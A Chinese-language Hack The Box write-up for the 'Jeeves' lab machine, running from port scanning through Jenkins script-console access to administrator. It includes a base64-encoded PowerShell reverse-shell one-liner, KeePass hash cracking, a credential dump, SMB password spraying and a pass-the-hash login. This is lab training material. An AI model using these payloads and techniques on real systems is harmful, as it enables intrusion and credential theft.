Jeeves
1. User
1.1. Recon
1.1.1. PortScan
┌──(root㉿kali)-[~/Desktop/htb/Jeeves]
└─# nmap 10.129.24.24
Starting Nmap 7.95 ( https://nmap.org ) at 2025-11-18 09:55 EST
Nmap scan report for 10.129.24.24
Host is up (0.25s latency).
Not shown: 996 filtered tcp ports (no-response)
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
445/tcp open microsoft-ds
50000/tcp open ibm-db2
Nmap done: 1 IP address (1 host up) scanned in 32.88 seconds
┌──(root㉿kali)-[~/Desktop/htb/Jeeves]
└─# nmap 10.129.24.24 -p 80,50000 -sCV
Starting Nmap 7.95 ( https://nmap.org ) at 2025-11-18 09:59 EST
Nmap scan report for JEEVES.Jeeves (10.129.24.24)
Host is up (0.23s latency).
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: Ask Jeeves
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
50000/tcp open http Jetty 9.4.z-SNAPSHOT
|_http-server-header: Jetty(9.4.z-SNAPSHOT)
|_http-title: Error 404 Not Found
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.22 seconds
Jetty 是 Java 写的轻量级 Web 服务器/Servlet 容器,常被 Jenkins 这类 Java Web 应用用来内置自带 Web 服务,直接对外提供界面
1.2. web
果然是这个老头儿,和jekins的一模一样
1.2.1. dir
┌──(root㉿kali)-[~/Desktop/htb/Jeeves]
└─# feroxbuster -u http://10.129.24.24/
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.13.0
───────────────────────────┬──────────────────────
🎯 Target Url │ http://10.129.24.24/
🚩 In-Scope Url │ 10.129.24.24
🚀 Threads │ 50
📖 Wordlist │ /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
👌 Status Codes │ All Status Codes!
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.13.0
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🔎 Extract Links │ true
🏁 HTTP methods │ [GET]
🔃 Recursion Depth │ 4
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404 GET 29l 95w 1245c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200 GET 1l 4w 50c http://10.129.24.24/error.html
200 GET 147l 319w 3744c http://10.129.24.24/style.css
200 GET 17l 40w 503c http://10.129.24.24/
[####>---------------] - 40s 6442/30004 3m found:3 errors:0
400 GET 6l 26w 324c http://10.129.24.24/error%1F_log
[####################] - 4m 30004/30004 0s found:4 errors:107
[####################] - 4m 30000/30000 115/s http://10.129.24.24/
123123
http://www/baidu.com
1.3. web 50000 Jetty
由于目前已知有用的信息确实很少,而且这是一台17年的靶机,那时候机器的字典并没有严格的要求,可以尝试换大字典爆破一下
┌──(root㉿kali)-[~/Desktop/htb/Jeeves]
└─# feroxbuster -u http://10.129.24.24:50000 -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.13.0
───────────────────────────┬──────────────────────
🎯 Target Url │ http://10.129.24.24:50000/
🚩 In-Scope Url │ 10.129.24.24
🚀 Threads │ 50
📖 Wordlist │ /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
👌 Status Codes │ All Status Codes!
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.13.0
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🔎 Extract Links │ true
🏁 HTTP methods │ [GET]
🔃 Recursion Depth │ 4
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404 GET 11l 26w -c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
302 GET 0l 0w 0c http://10.129.24.24:50000/askjeeves => http://10.129.24.24:50000/askjeeves/
302 GET 0l 0w 0c http://10.129.24.24:50000/askjeeves/search => http://10.129.24.24:50000/askjeeves/search/
302 GET 0l 0w 0c http://10.129.24.24:50000/askjeeves/about => http://10.129.24.24:50000/askjeeves/about/
302 GET 0l 0w 0c http://10.129.24.24:50000/askjeeves/security => http://10.129.24.24:50000/askjeeves/security/
302 GET 0l 0w 0c http://10.129.24.24:50000/askjeeves/projects => http://10.129.24.24:50000/askjeeves/projects/
302 GET 0l 0w 0c http://10.129.24.24:50000/askjeeves/j_acegi_security_check => http://10.129.24.24:50000/askjeeves/loginError
200 GET 16l 507w 11404c http://10.129.24.24:50000/askjeeves/login
500 GET 93l 598w 15433c http://10.129.24.24:50000/askjeeves/main
302 GET 0l 0w 0c http://10.129.24.24:50000/askjeeves/people => http://10.129.24.24:50000/askjeeves/people/
200 GET 15l 509w 11691c http://10.129.24.24:50000/askjeeves/editDescription
404 GET 16l 266w 7098c http://10.129.24.24:50000/askjeeves/signup
302 GET 0l 0w 0c http://10.129.24.24:50000/askjeeves/version => http://10.129.24.24:50000/askjeeves/version/
200 GET 14l 325w 8383c http://10.129.24.24:50000/askjeeves/newJob
200 GET 16l 508w 11526c http://10.129.24.24:50000/askjeeves/index
302 GET 0l 0w 0c http://10.129.24.24:50000/askjeeves/api/search => http://10.129.24.24:50000/askjeeves/api/search/
302 GET 0l 0w 0c http://10.129.24.24:50000/askjeeves/assets => http://10.129.24.24:50000/askjeeves/assets/
200 GET 1l 8w 663c http://10.129.24.24:50000/askjeeves/api/xml
200 GET 1l 4w 543c http://10.129.24.24:50000/askjeeves/api/python
302 GET 0l 0w 0c http://10.129.24.24:50000/askjeeves/api => http://10.129.24.24:50000/askjeeves/api/
200 GET 16l 492w 11015c http://10.129.24.24:50000/askjeeves/restart
可以发现存在 /askjeeves 路径
1.4. jenkins
Jenkins
经典的jenkins老头
直接到脚本命令行弹shell即可
println "powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA0AC4AOAA2ACIALAA0ADQANAA0ACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA==".execute().text
2. system
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeShutdownPrivilege Shut down the system Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeUndockPrivilege Remove computer from docking station Disabled
>>>> SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeTimeZonePrivilege Change the time zone Disabled
但这里我没能成功将二进制文件传输到目标上,就先不利用土豆提权了,毕竟也学不到什么
2.1. 信息收集
PS C:\users> tree /f /a
Folder PATH listing
Volume serial number is 00000200 71A1:6FA1
C:.
+---Administrator
+---DefaultAppPool
+---kohsuke
| +---.groovy
| | \---grapes
| +---Contacts
| +---Desktop
| | user.txt
| |
| +---Documents
>>>> | | CEH.kdbx
| |
| +---Downloads
| +---Favorites
| | | Bing.url
| | |
| | \---Links
| +---Links
| | Desktop.lnk
| | Downloads.lnk
| | OneDrive.lnk
| |
| +---Music
| +---OneDrive
| +---Pictures
| | +---Camera Roll
| | \---Saved Pictures
| +---Saved Games
| +---Searches
| | winrt--{S-1-5-21-2851396806-8246019-2289784878-1001}-.searchconnector-ms
| |
| \---Videos
\---Public
+---Documents
+---Downloads
+---Music
+---Pictures
\---Videos
这里利用web网站吧这个 CEH.kdbx 传出来
PS C:\Users\Administrator\.jenkins\workspace\xxxx> copy C:\users\kohsuke\documents\CEH.kdbx .
PS C:\Users\Administrator\.jenkins\workspace\xxxx> dir
Directory: C:\Users\Administrator\.jenkins\workspace\xxxx
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 9/18/2017 1:43 PM 2846 CEH.kdbx
在 工作空间 中即可找到文件
2.2. kepass crack
┌──(root㉿kali)-[~/Desktop/htb/Jeeves]
└─# keepass2john CEH.kdbx
CEH:$keepass$*2*6000*0*1af405cc00f979ddb9bb387c4594fcea2fd01a6a0757c000e1873f3c71941d3d*3869fe357ff2d7db1555cc668d1d606b1dfaf02b9dba2621cbe9ecb63c7a4091*393c97beafd8a820db9142a6a94f03f6*b73766b61e656351c3aca0282f1617511031f0156089b6c5647de4671972fcff*cb409dbc0fa660fcffa4f1cc89f728b68254db431a21ec33298b612fe647db48
D:\tools\加解密\hashcat-6.2.6>hashcat.exe -m 13400 hash.txt rockyou.txt
$keepass$*2*6000*0*1af405cc00f979ddb9bb387c4594fcea2fd01a6a0757c000e1873f3c71941d3d*3869fe357ff2d7db1555cc668d1d606b1dfaf02b9dba2621cbe9ecb63c7a4091*393c97beafd8a820db9142a6a94f03f6*b73766b61e656351c3aca0282f1617511031f0156089b6c5647de4671972fcff*cb409dbc0fa660fcffa4f1cc89f728b68254db431a21ec33298b612fe647db48:moonshine1
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 13400 (KeePass 1 (AES/Twofish) and KeePass 2 (AES))
Hash.Target......: $keepass$*2*6000*0*1af405cc00f979ddb9bb387c4594fcea...47db48
Time.Started.....: Wed Nov 19 22:57:16 2025 (25 secs)
Time.Estimated...: Wed Nov 19 22:57:41 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#01........: 171.4 kH/s (4.08ms) @ Accel:704 Loops:1 Thr:256 Vec:1
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 4325376/14344388 (30.15%)
Rejected.........: 0/4325376 (0.00%)
Restore.Point....: 0/14344388 (0.00%)
Restore.Sub.#01..: Salt:0 Amplifier:0-1 Iteration:5999-6000
Candidate.Engine.: Device Generator
Candidates.#01...: 123456 -> redskins1980
Hardware.Mon.#01.: Temp: 59c Util: 98% Core:2325MHz Mem:8001MHz Bus:8
密码 moonshine1
┌──(root㉿kali)-[~/Desktop/htb/Jeeves]
└─# keepassxc-cli ls CEH.kdbx
Enter password to unlock CEH.kdbx:
Walmart.com
Bank of America
>>>> It's a secret
EC-Council
Keys to the kingdom
DC Recovery PW
Jenkins admin
Backup stuff
General/
Windows/
Network/
Internet/
eMail/
Homebanking/
┌──(root㉿kali)-[~/Desktop/htb/Jeeves]
└─# keepassxc-cli export CEH.kdbx --format csv
Enter password to unlock CEH.kdbx:
"Group","Title","Username","Password","URL","Notes","TOTP","Icon","Last Modified","Created"
"CEH","Walmart.com","anonymous","Password","http://www.walmart.com","Getting my shopping on","","0","2017-09-18T17:38:16Z","2017-09-16T02:16:31Z"
"CEH","Bank of America","Michael321","12345","https://www.bankofamerica.com","","","0","2017-09-18T17:38:42Z","2017-09-16T02:16:31Z"
"CEH","It's a secret","admin","F7WhTrSFDKB6sxHU1cUn","http://localhost:8180/secret.jsp","","","0","2017-09-18T17:39:24Z","2017-09-18T17:38:45Z"
"CEH","EC-Council","hackerman123","pwndyouall!","https://www.eccouncil.org/programs/certified-ethical-hacker-ceh","Personal login","","0","2017-09-18T17:40:19Z","2017-09-18T17:39:35Z"
"CEH","Keys to the kingdom","bob","lCEUnYPjNfIuPZSzOySA","","","","0","2017-09-18T17:40:34Z","2017-09-18T17:40:22Z"
"CEH","DC Recovery PW","administrator","S1TjAtJHKsugh9oC4VZl","","","","0","2017-09-18T17:41:03Z","2017-09-18T17:40:37Z"
"CEH","Jenkins admin","admin","","http://localhost:8080","We don't even need creds! Unhackable! ","","0","2017-09-18T17:41:57Z","2017-09-18T17:41:08Z"
"CEH","Backup stuff","?","aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00","","","","0","2017-09-18T17:42:53Z","2017-09-18T17:42:06Z"
把密码做一个字典然后爆破
12345
S1TjAtJHKsugh9oC4VZl
pwndyouall!
F7WhTrSFDKB6sxHU1cUn
lCEUnYPjNfIuPZSzOySA
Password
┌──(root㉿kali)-[~/Desktop/htb/Jeeves]
└─# nxc smb 10.129.24.24 -u administrator -p pass
SMB 10.129.24.24 445 JEEVES [*] Windows 10 Pro 10586 x64 (name:JEEVES) (domain:Jeeves) (signing:False) (SMBv1:True)
SMB 10.129.24.24 445 JEEVES [-] Jeeves\administrator:12345 STATUS_LOGON_FAILURE
SMB 10.129.24.24 445 JEEVES [-] Jeeves\administrator:S1TjAtJHKsugh9oC4VZl STATUS_LOGON_FAILURE
SMB 10.129.24.24 445 JEEVES [-] Jeeves\administrator:pwndyouall! STATUS_LOGON_FAILURE
SMB 10.129.24.24 445 JEEVES [-] Jeeves\administrator:F7WhTrSFDKB6sxHU1cUn STATUS_LOGON_FAILURE
SMB 10.129.24.24 445 JEEVES [-] Jeeves\administrator:lCEUnYPjNfIuPZSzOySA STATUS_LOGON_FAILURE
SMB 10.129.24.24 445 JEEVES [-] Jeeves\administrator:Password STATUS_LOGON_FAILURE
这里还有一个LM/NTLM哈希
aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00
查不到明文,但是可以直接用于登录,
┌──(root㉿kali)-[~/Desktop/htb/Jeeves]
└─# nxc smb 10.129.24.24 -u administrator -H e0fb1fb85756c24235ff238cbe81fe00
SMB 10.129.24.24 445 JEEVES [*] Windows 10 Pro 10586 x64 (name:JEEVES) (domain:Jeeves) (signing:False) (SMBv1:True)
SMB 10.129.24.24 445 JEEVES [-] Error checking if user is admin on 10.129.24.24: The NETBIOS connection with the remote host timed out.
SMB 10.129.24.24 445 JEEVES [+] Jeeves\administrator:e0fb1fb85756c24235ff238cbe81fe00
2.3. NTFS隐写
c:\Users\Administrator\Desktop> type hm.txt
The flag is elsewhere. Look deeper.
这里使用 /R 参数
会输出中每个文件的备用数据流(Alternate Data Streams, ADS)信息。
可以看到目录里看不到的 NTFS 隐藏流,检测是否有额外内容附着在文件上
c:\Users\Administrator\Desktop> dir /R
Volume in drive C has no label.
Volume Serial Number is 71A1-6FA1
Directory of c:\Users\Administrator\Desktop
11/08/2017 09:05 AM <DIR> .
11/08/2017 09:05 AM <DIR> ..
12/24/2017 02:51 AM 36 hm.txt
>>>> 34 hm.txt:root.txt:$DATA
11/08/2017 09:05 AM 797 Windows 10 Update Assistant.lnk
2 File(s) 833 bytes
2 Dir(s) 2,634,866,688 bytes free
c:\Users\Administrator\Desktop> powershell -Command "Get-Content .\hm.txt -Stream root.txt"
afbc5bd4b615a60648cec41c6ac92530
#也可以使用more命令
c:\Users\Administrator\Desktop> more < hm.txt:root.txt:$DATA
afbc5bd4b615a60648cec41c6ac92530